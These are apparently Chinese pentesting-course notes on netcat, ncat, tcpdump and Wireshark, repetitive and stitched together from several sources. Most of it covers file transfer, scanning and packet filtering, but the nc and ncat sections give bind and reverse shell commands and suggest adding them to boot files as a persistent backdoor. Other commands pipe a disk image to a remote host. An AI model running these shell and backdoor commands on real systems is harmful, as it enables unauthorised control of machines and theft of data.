NC远程控制: //一定程度上代替ssh
正向:(被控者监听端口)
A:nc -lp 333 -c bash //使shell位于监听端口处
B:nc 1.1.1.1 333
反向:(被控者对外访问)
A:nc -lp 333
B:nc 1.1.1.1 333 -c bash
远程控制对方机器后,可以把nc启动写成脚本放入开机启动文件(开后门),这样即使对方修复了漏洞,也能操控对方的系统。
通常防火墙不会禁止从内向外的访问端口,或者常用端口,此时可用nc控制
如果企业使用专门的服务器作为常用端口服务器,而跑业务的服务器禁止所有端口,则难攻破。
windows下使用cmd作为shell
·流媒体服务
A:cat 1.mp4 | nc -lp 333(以流的方式传输)
B: nv -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000 -
·端口扫描
A:nc -nvz 1.1.1.1 1-65535 tcp扫描
B:nc -vnzu 1.1.1.1 1-1024 udp扫描
·远程克隆硬盘
A:nc -lp 333 | dd of=/dev/sda
B:dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
远程电子取证,可以将目标服务器硬盘远程复制
• 传输文件
A:nc -lp 333 >2.mp4 //接收端(服务端),侦听333端口等待接收,将接收的文件保存为1.mp4
B:nc -nv 1.1.1.1 333 < a.mp4 –q 1 或 //发送端(客户端),连接333端口将a.mp4输入到333
A:nc -lp 333 < a.mp4 -q 1 //发送端(服务端),侦听333端口并把a.mp4输入到333
B: nc -nv 1.1.1.1 333 > 2.mp4 //接收端(客户端),连接333端口接收并生成2.MP4
• 传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1 //打包music目录放到侦听的333端口,tar -cvf打包
B:nc -nv 1.1.1.1 333 | tar -xvf – //tar -xvf解包
• 加密传文件
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 //接收
B:mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1 //发送
nc -v连接的详细信息
-n (ip地址)
pop3走110端口
需要用base64进行编码
smtp走25端口
传输文本信息
A(服务器端):nc -l -p 端口
打开并侦听本地端口
B:nc -nv ip地址 端口号
连接服务器端口
远程电子取证
ls -l | nc -nv 10.1.1.12 333 (服务器地址 端口)
A | B A输出的信息作为B命令的内容
-q 1 标准输入完成之后等几秒退出
nc -l -p 333 > ps.txt 将收集到的信息重定向到ps.txt文件里
NETCAT
·侦听模式/传输模式
·Telnet/Banner
作为客户端的时候能连接其他服务器的服务端口并发送指令进行探测 nc-h 获取帮助
·传输文本信息
·传输文件/目录
·加密传输文件
·远程控制/木马
·加密所有流量
·流媒体服务器
·远程克隆硬盘--电子取证
A(服务器端): cat 1.mp4 | nc -lp 333 (侦听333端口)
•
B(客户端):nc -nv 1.1.1.1 333 | mplayer(视频播放的客户端程序) -vo x11 -cache 3000 -(指定
缓存大小,默认3000大小)
(
客 户 端 )
nc -nvz 1.1.1.1 1-65535 (所有端口扫一遍)
•
nc –vnzu 1.1.1.1 1-1024
-z 进行I/O模式的扫描
默认使用tcp协议探测,
-u 探测utp的端口
每个扫描器扫描不一定完全准确,作为辅助参考的信息,建议多使用几种方式进行端口扫描
传输⽂文件
•
A(接收端,打开(侦听)端口):nc -lp 333 > 1.mp4 (侦听333端口,侦听的内容保存到1.mp4)
•
B(发送端):nc -nv 1.1.1.1 333 < 1.mp4 –q 1 (将要传递的文件1。mp4输入到333端口上)(-q 1传递完1秒自
动断开)
•
或
•
A(文件的发送端,侦听端口,将视频内容放到这个端口里面,等别人下载):nc -q 1 -lp 333 < a.mp4
•
B(文件的接收端): nc -nv 1.1.1.1 333 > 2.mp4 (接受到2.mp4这个文件里)
•
传输⺫⽬目录
•
A:tar(先把目录打包) -cvf - music/ | nc -lp 333 –q 1
•
B:nc -nv 1.1.1.1 333 | tar -xvf – (解包)
•
加密传⽂文件
•
A:nc -lp 333 | mcrypt(默认情况下没有安装) --flush(接收完就flush掉) -Fbqd(解密) -a rijndael-256
-m ecb > 1.mp4 (解密)
•
B: mcrypt --flush -Fbq(加密) -a rijndael-256(加密方法) -m ecb < a.mp4(先加密) | nc -nv 1.1.1.1
333 -q 1
可作为服务端启用或客户端启用
•
nc –nv 1.1.1.1 110
•
nc –nv 1.1.1.1 25
•
nc –nv 1.1.1.1 80
nc -v 显示详细的输出内容
nc -n 连接ip地址,不进行dns解析(先ping域名获得IP地址)
客户端连接到服务端口
USER xxxx(BASE64编码之后的邮箱)
PASSWORD 也是base64编码之后的密码
http服务器 端口80
邮箱服务器 端口110
pop3用户名和密码需要使用base64编码,ctrl+d 将用户名编码发送,ctrl+d返回一个OK,然后可以输入password
smtp不需要编码
|将前一个命令的输出作为后一个命令的输入
1. nc -h
基本格式:nc [-options] hostname port [ports] ...
nc -l -p port [options] [hostname] [port]
-d 后台模式
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时
端口的表示方法可写为M-N的范围格式。
2.nc的基本用法
格式:nc -nvv 192.168.x.x 80
讲解:连到192.168.x.x的TCP80端口
2)监听LOCAL主机,例子:
格式:nc -l -p 80
讲解:监听本机的TCP80端口
3)扫描远程主机,例子:
格式:nc -nvv -w2 -z 192.168.x.x 80-445
讲解:扫描192.168.x.x的TCP80到TCP445的所有端口
传输⽂文本信息
A:nc -l -p 4444
• B:nc –nv 1.1.1.1 4444
传输⽂件/目录
• 传输⽂件
• A:nc -lp 333 > 1.mp4
• B:nc -nv 1.1.1.1 333 < 1.mp4 –q 1 • 或 • A:nc -q 1 -lp 333 < a.mp4 • B: nc -nv 1.1.1.1 333 > 2.mp4
• 传输目录
• A:tar -cvf - music/ | nc -lp 333 –q 1 • B:nc -nv 1.1.1.1 333 | tar -xvf –
加密传输⽂件
• 加密传⽂件
• A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
• B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
远程控制/⽊马
加密所有流量
流媒体服务器
A: cat 1.mp4 | nc -lp 333
B: 1.1.1.1 333 | mplayer -vo x11 -cache 3000
远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程控制:
正向:
• A:nc -lp 333 -c bash
• B:nc 1.1.1.1 333
• 反向:
• A:nc -lp 333
• B:nc 1.1.1.1 333 -c bash • 注:Windows⽤用户把bash改成cmd;
nccat:管道加密
A:ncat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
B:ncat -nv 1.1.1.1 333 --ssl
tcpdump:
- 抓取所有经过 eth1,目的或源地址是 192.168.1.1 的网络数据
# tcpdump -i eth1 host 192.168.1.1
- 源地址
# tcpdump -i eth1 src host 192.168.1.1
- 目的地址
# tcpdump -i eth1 dst host 192.168.1.1
过滤端口
--------
- 抓取所有经过 eth1,目的或源端口是 25 的网络数据
# tcpdump -i eth1 port 25
- 源端口
# tcpdump -i eth1 src port 25
- 目的端口
# tcpdump -i eth1 dst port 25
网络过滤
--------
# tcpdump -i eth1 net 192.168
# tcpdump -i eth1 src net 192.168
# tcpdump -i eth1 dst net 192.168
协议过滤
--------
# tcpdump -i eth1 arp
# tcpdump -i eth1 ip
# tcpdump -i eth1 tcp
# tcpdump -i eth1 udp
# tcpdump -i eth1 icmp
常用表达式
非 : ! or "not" (去掉双引号)
且 : && or "and"
或 : || or "or"
- 抓取所有经过 eth1,目的地址是 192.168.1.254 或 192.168.1.200 端口是 80 的 TCP 数据
# tcpdump -i eth1 '((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host
192.168.1.200)))'
- 抓取所有经过 eth1,目标 MAC 地址是 00:01:02:03:04:05 的 ICMP 数据
# tcpdump -i eth1 '((icmp) and ((ether dst host 00:01:02:03:04:05)))'
- 抓取所有经过 eth1,目的网络是 192.168,但目的主机不是 192.168.1.200 的 TCP 数据
# tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host 192.168.1.200)))'
只抓 SYN 包
# tcpdump -i eth1 'tcp[tcpflags] = tcp-syn'
抓 SYN, ACK
# tcpdump -i eth1 'tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack != 0'
抓 SMTP 数据
----------
# tcpdump -i eth1 '((port 25) and (tcp[(tcp[12]>>2):4] = 0x4d41494c))'
抓取数据区开始为"MAIL"的包,"MAIL"的十六进制为 0x4d41494c。
抓 HTTP GET 数据
--------------
# tcpdump -i eth1 'tcp[(tcp[12]>>2):4] = 0x47455420'
"GET "的十六进制是 47455420
抓 SSH 返回
---------
# tcpdump -i eth1 'tcp[(tcp[12]>>2):4] = 0x5353482D'
"SSH-"的十六进制是 0x5353482D
- 抓 DNS 请求数据
# tcpdump -i eth1 udp dst port 53
实时抓取端口号8000的GET包,然后写入GET.log
tcpdump -i eth0 '((port 8000) and (tcp[(tcp[12]>>2):4]=0x47455420))' -nnAl -w /tmp/GET.log
wireshark
1.tcp协议的三次握手:
TCP握手协议
在TCP/IP协议中,TCP协议提供可靠的连接服务,采用三次握手建立一个连接.
第一次握手:建立连接时,客户端发送syn包(syn=j)到服务器,并进入SYN_SEND状态,等待服务器确认;
SYN:同步序列编号(Synchronize Sequence Numbers)
第二次握手:服务器收到syn包,必须确认客户的SYN(ack=j+1),同时自己也发送一个SYN包(syn=k),即SYN+ACK包,此时服务器进入SYN_RECV状态;
第三次握手:客户端收到服务器的SYN+ACK包,向服务器发送确认包ACK(ack=k+1),此包发送完毕,客户端和服务器进入ESTABLISHED状态,完成三次握手.
完成三次握手,客户端与服务器开始传送数据。
2.ssl:对流进行加密
smtp协议传输为明文流
NETCAT
网络工具中的瑞士军刀–小身材、大智慧
telnet:(远程登录)
banner信息:(横幅广告,用于表明端口的身份,显示欢迎信息)
ex:
nc -nv ip 端口侦听目标端口
nc -nv 1.1.1.1 110
nc -nv 1.1.1.1 80
A:nc -l -p 4444 -l 表示侦听端口命令,-p 指定要侦听的端口(服务端)
B:nc -nv 1.1.1.1 4444
可用于远程电子取证信息收集
侦听333端口,将侦听到的内容输出到1.mp4 >表示输出连接目标端口,将要传输的内容输入,传递完后1s连接自动断开 <表示输入,-q表示完成前一个命令后自动断开连接<a.mp4 -q 1>2.mp4将目录打包成一个文件,再传输接收文件,解包>1.mp4<a.mp4 | nc -nv 1.1.1.1 333 -q lA:nc -lp 333 | dd of=/dev/sda
B:DD if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
-z扫描模式(默认只扫描tcp的端口)-u(扫描udp的端口)简介:
主要功能:抓包嗅探协议分析
抓包引擎:
Libpcap9——Linux
Winpcap10——Windows
启动
启动时会有一个权限方面的报错,不用管它,处理这个错误没有什么意义
选择抓包网卡
个人电脑通常会有一个以太网网卡和无线网网卡,服务器可能有多个网卡
混杂模式
会抓取所有经过网卡的数据包
实时抓包
保存和分析捕获文件
过滤掉干扰数据包
抓包筛选器
显示筛选器
数据包的分层结构
Arp,lcmp,UDP,dns,
http/https
ftp
TCP(三次握手)
数据流
节点数
协议分布
包大小分布
会话连接
解码方式
专家系统
抓包对比nc、ncat加密与不加密的流量
企业抓包部署方案(全流量抓包)
No-GUI的抓包分析工具
Linux、Unix系统默认安装
默认只抓68个字节
tcpdump -i eth0 -s 0 -w file.pcap
Tcpdump -i eth0 part 22
侦察机 开启 nc -l -p 333
被侦察机 ls -l | nc -nv ip 333
nc -l -p 333 > ps.txt 重定向
ps aux | nc -nv ip 333 -q 1查看进程
lsof
电子取证
NC
侦听模式/传输模式
telnet / 获取banner信息
nc -nv 1.1.1.1 110 (pop3)
nc -nv 1.1.1.1 25 (smtp)
nc -nv 1.1.1.1 80
-v:显示相关的详细链接信息
-n:加ip地址时不进行dns解析
传输文本信息
A:nc -l -p 4444
B:nc -nv 1.1.1.1 4444
-l:listen,打开监听一个端口
-p:指定开放端口号
-q:nc完就断开连接
A: nc -l -p 333 > ps.txt
B: ps aux | nc -nv AIP -q 1
传输文件/目录
传输文件:
A: nc -l -p 333 > 1.map4
B: nc -nv AIP 333 < 1.mp4 -q 1
或
A: nc -l -p 333 < a.mp4 -q 1
B: nc -nv AIP 333 > b.mp4
>: 表示接收方
<: 表示发送方
传输目录:
A: tar -cvf - music/ | nc -lp 333 -q 1
B: nc -nv AIP 333 | tar -xvf -
先把目录打包,在放到nc的管道中
加密传输文件
A: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-356 -m ecb < a.mp4 | nc -nv AIP 333 -q 1
远程控制/木马
正向:
A: nc -lp 333 -c bash
B: nc 1.1.1.1 333
反向:
A: nc -lp 333
B: nc 1.1.1.1 333 -c bash
注:Windows用户把bash改成cmd
加密所有流量
流媒体服务器
server: cat 1.mp4 | nc -lp 333
client: nc -nv serverIP 333 | mplayer -vo x11 -cache 3000 -
远程克隆硬盘
A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1
端口扫描
nc -nvz 1.1.1.1 1-65535
nc-vnzu 1.1.1.1 1-1024
-z: 扫描模式
-u; 探测所有udp端口
ncat
A: ncat -c bash --allow bIP -vnl 333 --ssl
B: ncat -nv aIP 333 --ssl
抓包
默认只抓68个字节
tcpdump -i eth0 -s 0 -w file.pcap
tcpdump -i eth0 port 22
读取抓包文件
tcpdump -r file.pcap
tcpdump -n -r http.pcap | awk'{print $3 }' | sort -u
tcpdump -n src host 145.254.160.237 -r http.cap
tcpdump -n dst host 145.254.160.237 -r http.cap
tcpdump -n port 53 -r http.cap
tcpdump -nX port 80 -r http.cap
tcpdump -A -b 'tcp[13]=24' -r http.cap
netstat -pantu | grep 333查看333端口是否打开
做好侦听之后可以进行远程取证ls -l | nc -nv 10.1.1.2 333将ls -l命令的执行结果发送到IP为10.1.1.12的机器上通过333端口
ps aux查看进程
nc -l -p 333 > ps.txt如果有从侦听的333端口的机器上传过来信息便将其导入到ps.txt文本中。
ps aux | nc-nv 10.1.1.12 333 -q 1此处-q 1 的命令意思是1秒后断开当前nc连接
lsof命令列出所有打开的文件
more lsof.txt打开losf文件显示百分比(功能类似cat)
nc -v显示详细连接信息
nc -vn不做域名解析即no DNS,-n后面要跟IP地址不做域名解析连接一个IP
nc -l -p 4444该命令-l是侦听一个端口,-p是指定端口号为4444起到的作用是服务端的作用
